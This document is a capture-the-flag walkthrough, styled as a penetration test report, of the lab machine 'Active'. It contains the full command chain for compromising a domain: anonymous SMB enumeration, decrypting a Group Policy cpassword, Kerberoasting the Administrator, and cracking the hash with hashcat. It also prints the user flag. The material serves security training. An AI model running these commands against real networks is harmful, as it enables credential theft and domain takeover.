Active
Date: 09/01/2026
Difficulty: Easy
Tags: Windows, Kerberoasting, SMBMap, Kerberoasting
Description: Active is an easy to medium difficulty machine, which features two very prevalent techniques to gain privileges within an Active Directory environment.
Executive Summary
Inlanefreight Ltd. contracted the tester to perform an internal penetration test of a Domain Controller to identify security weaknesses and provide remediation recommendations. The assessment utilised a “Black Box” approach, meaning the tester had no prior knowledge of the environment. During the test, critical misconfigurations were identified that allowed an unauthenticated attacker to achieve full administrative control over the active.htb domain.
The compromise began with the discovery of an insecurely configured network share that allowed anonymous access. Within this share, sensitive configuration files were found containing encrypted passwords. Once these were decrypted, the tester gained a foothold as a service user. By leveraging the privileges of this account, the tester performed a Kerberoasting attack to target the Domain Administrator, eventually cracking the administrator’s password and taking complete control of the system.
Walkthrough Summary
The tester performed the following to fully compromise the active.htb domain:
- Discovered anonymous access to the
ReplicationSMB share. - Retrieved and decrypted a password for the
SVC_TGSaccount from a Group Policy XML file. - Performed a Kerberoasting attack using the
SVC_TGScredentials to target theAdministratoraccount. - Cracked the
AdministratorTGS ticket hash offline to obtain cleartext credentials. - Authenticated as Domain Administrator to achieve full system takeover.
Technical Walkthrough
1. Enumeration
1.1. Initial Port Scan
The assessment started with a shallow port scan, this provided the tester with a wide, but shallow view of open ports on the target; providing a quick overview of the possible attack surface of the target.
~/active [10.10.14.59]
> sudo nmap -Pn -p- 10.10.10.100 -T4
[sudo] password for kali:
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-09 08:55 +0000
Nmap scan report for 10.10.10.100
Host is up (0.018s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
49166/tcp open unknown
49168/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 31.17 seconds1.2. Targeted Port Scan
With an overview of open ports, the tester executed a targeted, aggressive scan. This scan utilises the -A option, which attempts to identify port versions, the host operating system (OS) and if able, would attempt to automatically run exploitation scripts against services with known vulnerabilities.
Noise Warning
The
-Aoption is loud and should not be used in a real assessment but in the case of a CTF: is fast and easy.
~/active [10.10.14.59]
> sudo nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49168 10.10.10.100 -A -Pn
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-09 09:37 +0000
Nmap scan report for 10.10.10.100
Host is up (0.018s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-09 09:37:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msdfsr?
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open unknown
49165/tcp open unknown
49166/tcp open unknown
49168/tcp open unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.68 secondsThe results from this scan provided useful additional details:
- OS: Windows Server 2008 R2 SP1
- Hostname: DC
- Domain: active.htb
- SMBv2 is required.
The host was positvely identified as a Domain Controller, this is because ports 88 (Kerberos), 389 (LDAP), 464 (kpasswd, a Kerberos utility) and 3268 (Active Directory Global Catalog) are open. It also enabled the tester to identify possible targets for attack, for example:
| Port | Service | Description |
|---|---|---|
| 389 | LDAP | Can be used for Null Sessions or anonymous binds to enumerate users, groups, and computers. |
| 445 | SMB | The primary target for checking Anonymous Login or Guest Access to shared folders. |
| 135 / 593 | RPC | Useful for enumerating users via rpcclient or identifying specific services. |
2. Initial Access
2.1. Anonymous SMB Share Enumeration
The tester checked for the common SMB misconfiguration: anonymous login. Using smbclient, the tester confirmed that an anonymous login was successful, providing a list of available shares.
~/active [10.10.14.74]
> smbclient -L //10.10.10.100
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableThis tool also provided a list of shares that were hosted. With confirmation of this misconfiguration and its exploitabilty, the assessor ran the tool smbmap to retrieve more verbose information from the SMB server.
~/active [10.10.14.74]
> smbmap -H 10.10.10.100
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connectionsThe output of this shows that the assessor had READ access for the Replication share. This share acts as a synchronized repository for the SYSVOL folder, containing Group Policy Objects (GPOs) and scripts, which is managed by the DFS Replication (DFSR) service.
While DFSR is a standard mechanism for ensuring Group Policy Objects (GPOs) and logon scripts are consistent across all Domain Controllers, the exposure of this share to unauthenticated or low-privileged users presents a significant security risk.
In a Windows Active Directory environment, the SYSVOL directory must be accessible via SMB to every computer and user in the domain. This accessibility allows client machines to:
- Retrieve Group Policy Objects (GPOs): Apply security configurations, registry tweaks, and software installations during boot or login.
- Execute Logon Scripts: Run administrative scripts (e.g., mapping network drives) stored in the
scriptssub-directory.
The replication of these files is vital for high availability; if one Domain Controller fails, the client simply fetches the required data from an alternative DC via SMB.
The assessor then continued enumerating this readable share.
~/active [10.10.14.74]
> smbmap -H 10.10.10.100 -r Replication --depth 10
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
./Replication
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 active.htb
./Replication//active.htb
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 scripts
./Replication//active.htb/DfsrPrivate
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Installing
./Replication//active.htb/Policies
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 06:38:11 2018 GPE.INI
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 06:38:11 2018 Registry.pol
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 SecEdit
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 1098 Sat Jul 21 06:38:11 2018 GptTmpl.inf
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Groups
./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 06:38:11 2018 Groups.xml
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 SecEdit
./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 3722 Sat Jul 21 06:38:11 2018 GptTmpl.inf
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
[*] Closed 1 connectionsOne file stood out within this output, the Groups.xml file is a configuration file used by Group Policy Preferences (GPP) to manage local users and groups on domain-joined machines. This file is a primary target as it may hold credentials that can be exfiltrated.
The assesor runs another smbmap command to download this file and retrieve a list of users and groups.
~/active [10.10.14.74]
> smbmap -H 10.10.10.100 --download ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (533 bytes)
[+] File output to: /home/kali/active/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml
[*] Closed 1 connectionsThe file contained the details for the user active.htb\SVC_TGS and the encrypted password edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ.
The assessor then ran the gpp-decrypt tool against the found encrypted password:
~/active [10.10.14.74]
> gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
<REDACTED>GPP Decrypt
gpp-decryptis a ruby script that will decrypt a given GPP encrypted string.
What is the GPP string?
When an administrator uses GPP to manage local accounts, map drives, or schedule tasks, the Domain Controller generates an XML file. If a password is required for that task, it is stored in an attribute called
cpassword.The “string” you see in the XML file looks like a long, Base64-encoded block of text. This is the AES-256 encrypted version of the password.
2.2. Credentialed SMB Enumeration
With user credentials exfiltrated the assessor started enumerating the SMB service again, this time with SVC_TGS user.
~/active [10.10.14.74]
> smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p <REDACTED>
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
[*] Closed 1 connections Read access had been gained on the Users, SYSVOL and NETLOGON shares. Enumerating further within the Users share provided a list of files and folders the user could access.
{ title=“smbmap is used to show all files within the Users share.” }
~/active [10.10.14.74]
> smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p <REDACTED> -r Users --depth 10
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.10.100:445 Name: active.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
./Users
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 .
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 ..
dr--r--r-- 0 Mon Jul 16 06:14:21 2018 Administrator
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 All Users
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Default
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Default User
fr--r--r-- 174 Mon Jul 16 17:01:17 2018 desktop.ini
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Public
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
<SNIP>
./Users//SVC_TGS
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 .
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 ..
dr--r--r-- 0 Sat Jul 21 11:14:20 2018 Contacts
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 Desktop
dr--r--r-- 0 Sat Jul 21 11:14:28 2018 Downloads
dr--r--r-- 0 Sat Jul 21 11:14:50 2018 Favorites
dr--r--r-- 0 Sat Jul 21 11:15:00 2018 Links
dr--r--r-- 0 Sat Jul 21 11:15:23 2018 My Documents
dr--r--r-- 0 Sat Jul 21 11:15:40 2018 My Music
dr--r--r-- 0 Sat Jul 21 11:15:50 2018 My Pictures
dr--r--r-- 0 Sat Jul 21 11:16:05 2018 My Videos
dr--r--r-- 0 Sat Jul 21 11:16:20 2018 Saved Games
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 Searches
./Users//SVC_TGS/Desktop
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 .
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 ..
fw--w--w-- 34 Fri Jan 9 06:35:45 2026 user.txt
[*] Closed 1 connectionsThis allowed the Assessor to achieve the first goal and read the flag located at ./Users//SVC_TGS/Desktop/user.txt.
~/active [10.10.14.74]
> smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p <REDACTED> --download ./Users//SVC_TGS/Desktop/user.txt
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: Users\SVC_TGS\Desktop\user.txt (34 bytes)
[+] File output to: /home/kali/active/10.10.10.100-Users_SVC_TGS_Desktop_user.txt
[*] Closed 1 connections
~/active [10.10.14.74]
> ls
10.10.10.100-Users_SVC_TGS_Desktop_user.txt Groups.xml
~/active [10.10.14.74]
> \cat 10.10.10.100-Users_SVC_TGS_Desktop_user.txt
0a6fc936ca0d3fca127797c56204a6f23. Internal Domain Enumeration
3.1. User Discovery
The assessor moved onto enumerating the Windows Domain. This started with enumerating for more domain users.
~/active [10.10.14.74]
> nxc smb 10.10.10.100 -u 'SVC_TGS' -p '<REDACTED>' --users
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:<REDACTED>
SMB 10.10.10.100 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.100 445 DC Administrator 2018-07-18 19:06:40 0 Built-in account for administering the computer/domain
SMB 10.10.10.100 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.100 445 DC krbtgt 2018-07-18 18:50:36 0 Key Distribution Center Service Account
SMB 10.10.10.100 445 DC SVC_TGS 2018-07-18 20:14:38 0
SMB 10.10.10.100 445 DC [*] Enumerated 4 local users: ACTIVE3.2. Password Policy Enumeration
The assessor also enumerated the password policy using the same netexec tool.
{ title=“netexec is used with the –pass-pol flag to retrieve the domains password policy.” }
~/active [10.10.14.74]
> nxc smb 10.10.10.100 -u 'SVC_TGS' -p '<REDACTED>' --pass-pol
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:<REDACTED>
SMB 10.10.10.100 445 DC [+] Dumping password info for domain: ACTIVE
SMB 10.10.10.100 445 DC Minimum password length: 7
SMB 10.10.10.100 445 DC Password history length: 24
SMB 10.10.10.100 445 DC Maximum password age: 41 days 23 hours 53 minutes
SMB 10.10.10.100 445 DC
SMB 10.10.10.100 445 DC Password Complexity Flags: 000001
SMB 10.10.10.100 445 DC Domain Refuse Password Change: 0
SMB 10.10.10.100 445 DC Domain Password Store Cleartext: 0
SMB 10.10.10.100 445 DC Domain Password Lockout Admins: 0
SMB 10.10.10.100 445 DC Domain Password No Clear Change: 0
SMB 10.10.10.100 445 DC Domain Password No Anon Change: 0
SMB 10.10.10.100 445 DC Domain Password Complex: 1
SMB 10.10.10.100 445 DC
SMB 10.10.10.100 445 DC Minimum password age: 1 day 4 minutes
SMB 10.10.10.100 445 DC Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.100 445 DC Locked Account Duration: 30 minutes
SMB 10.10.10.100 445 DC Account Lockout Threshold: None
SMB 10.10.10.100 445 DC Forced Log off Time: Not Set4. Privilege Escalation
4.1. Kerberoasting
Following a predfined methodology the assesor attempted a kerberoast attack as this is a common privilege escalation technique with credentialed access.
Kerberoasting targets SPN accounts because domain users can request tickets for these accounts, which are encrypted with the target account’s NTLM hash.
~/active [10.10.14.74]
> nxc ldap active.htb -u SVC_TGS -p <REDACTED> --kerberoasting nxc_kerb.list
LDAP 10.10.10.100 389 DC [*] Windows 7 / Server 2008 R2 Build 7601 (name:DC) (domain:active.htb)
LDAP 10.10.10.100 389 DC [+] active.htb\SVC_TGS:<REDACTED>
LDAP 10.10.10.100 389 DC [*] Skipping disabled account: krbtgt
LDAP 10.10.10.100 389 DC [*] Total of records returned 1
LDAP 10.10.10.100 389 DC [*] sAMAccountName: Administrator, memberOf: ['CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb', 'CN=Domain Admins,CN=Users,DC=active,DC=htb', 'CN=Enterprise Admins,CN=Users,DC=active,DC=htb', 'CN=Schema Admins,CN=Users,DC=active,DC=htb', 'CN=Administrators,CN=Builtin,DC=active,DC=htb'], pwdLastSet: 2018-07-18 15:06:40.351723, lastLogon: 2026-01-09 06:35:47.140954
LDAP 10.10.10.100 389 DC $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb\Administrator*$cde901693328b44d6e9ff2f6b5f954fc$362b951ec8f18154a9b754c6421ea68e61ab4ab3b7775d1c6206693f9741ed64113cdcb8751964044eefc4a3be8ff6a260af4336bcfe072e36c724e9a2f34f2115676e37ce6e43608eef6f13f7c795db9c04ad689cb0d486d8842efa41d06a30c0909bf249f6e8726fbfacd3e4f3cd07e36ff920ddcb8fa0be870c76932681ffbb10c8d6469d059a3aeb2680a930e463400693ffd75356b73a903178d451285373e42a155bf3f59adf868a16ed271f691add1c791107415afd2e3fa2530cff11b0fff8cff4526a67af3cb71adb296bfae9a461cba75d488605f0b4f4cffdce0eceeaf148f5a371cb56bdf963406109bfd25e0071534e84e7020a6cb2e2c823bfdfbce0a528810fefb70dcce03328a910e16737019f36a24a35e9d3df7e6c1279ff27f9e0a695148178d0246f0af177b33d68f1de4f23474f3f7ab8b350017928e28b785f279b0e49b4ef061cb517d1f1ef0c0ef6b147303a07b8317c8dfc5b9c40cd35f4f1e4c17f24682cdaab2f3d3212bfda53e3011b5e8e29a48604381bf3ca3c1c65223f1099e389a5354603d14aaf5b9557bb6b1330790cd3000f34d63960dff7792382b2ecf9064fa6bf69392a245f0053e961ce84496594366a8fc0c8e77c875f8432ae606969a22c032f1012c2d017417e6cca83522efea84e57f82f75891cd77c49fd0b6d81c00cacb56e389fd6a407404e65dbfffd6b789f3f2d9b70502d121ecbb2a49d5af7c902c5379825bd8961cd63760ebdba1e6f060524848a2063b2ac438e47261bec70b4ecbc10c1b2d62779a415b19339cc6087dbf42c3cf3d846920dcf8866be2e6538e863e7dc589fe558b80d868f55c61ca204f70c3d0a7d996aa736c5176cacbcc806bed9d23f7fbee37eb01a93b05280085dbcb45884654feb8ad9ffd975d7c08a9f39e2d93822a1124861ea4b858956612985acff535e69c760f2557788d384880128ece7f77a8c94fc84282752a07829a54480bfffd721488f4138ccdb0976b2eda786a3f497e4adb6245c5584c78c1c15eb401d2c07a379cfc8bcbd5558a53f884a6ddfc46e40409839d5736eee2dd5e2df2d5bdaa46a4973b7f7bf1f675b2f0edab214b8d352776d3e89768eed2782a6eea449427766b4da14bcfc7cee131f330fbcc2baf371066ece8c301317d3353fc33013fb3e3031412daf977a8499d9bfdaf5a9455d304df83c364db4002f8d067a08e1d201481644554955d0330bfc49897fe1d83b18132e67c2efe2The attack successfully retrieved a Kerberos TGS ticket for the Administrator account, which was saved for offline processing.
4.2. Offline Credential Cracking
The tester utilised Hashcat with the rockyou.txt wordlist to crack the retrieved TGS ticket hash (Mode 13100).
~/active [10.10.14.74]
> hashcat -m 13100 -a 0 administrator.krb /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-Intel(R) Core(TM) Ultra 7 155H, 8978/17956 MB (4096 MB allocatable), 10MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
